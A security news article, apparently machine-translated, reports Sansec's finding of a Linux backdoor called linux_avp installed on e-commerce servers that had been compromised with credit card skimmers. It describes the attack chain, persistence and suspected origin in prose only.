Hackers use Linux backdoor on compromised e-commerce sites with software skimmers

safety Researchers have discovered a new one Hacking campaign who installed a Linux backdoor on compromised ecommerce sites after a credit card skimmer was deployed on merchant websites.

Sansec Threat Research Team researchers discovered a new malicious agent “Linux_avp”, which is hidden as a system process on e-commerce servers. They said that hackers started using this malware all over the world last week and needed commands from a control server in Beijing.

In the campaign, hackers launched automated e-commerce attack investigations and tested dozen of vulnerabilities in popular online shop platforms.

“After a day and a half, the attacker found a vulnerability while uploading files in one of the store’s plugins. He / she then uploaded a webshell and modified the server code to intercept customer data, ”the researchers said.

Researchers said hackers then called linux_avp. uploaded Malware, a Golang program that starts, removes itself from the hard drive, and disguises itself as a fake ps -ef process.

“Analysis of linux_avp suggests that it is acting as a back door, waiting for commands from a server hosted in Beijing (Alibaba),” the researchers said. The back door also revealed where the user known as “dob” created the back door in a project folder lin_avp, codenamed GREECE.

The malware also injects a malicious crontab entry to ensure access in case the process is removed or the server restarted. The crontab downloads the executable Golang malware into a randomly writable directory and installs two configuration files. “One contains a public key that is believed to be used to ensure that no one other than the malware owner can execute commands,” added the researchers.

This case has another Chinese connection, according to researchers, as a line has been added to the e-commerce platform’s code called app / design / frontend / favicon_absolute_top.jpg containing PHP code to get a fake payment form and paste it into the store . Researchers said the IP for this was hosted in Hong Kong and was previously observed as a skimming exfiltration endpoint in July and August of this year.

Researchers said that at the time of writing, no other antivirus vendor had detected the malware.

“Strangely, an individual had submitted the same malware on Virustotal on October 8th with the note “test”. This was only one day after the successful break-in into our customer’s shop, ”said the researchers.

They added that the person uploading the malware could very well be the malware writer who wanted to claim that popular antivirus engines fail to detect their creation.

Recommended resources

Why faster update cycles and modern infrastructure management are crucial for business success

The connection between modern server infrastructure and business agility

Free download

Four characteristics of executives in networked companies

Create more meaningful work experiences for employees

download now

Modernize the data stack to transform the data experience

Next generation business intelligence and analytics

Free download

The three biggest IT problems of the new reality and how to solve them

Increase failure safety with standardized operations and service management

Free download

About Willie Ash

Check Also

Ubuntu Core brings real-time processing to Linux IoT

Most of you are familiar with Ubuntu as a desktop operating system; others know it …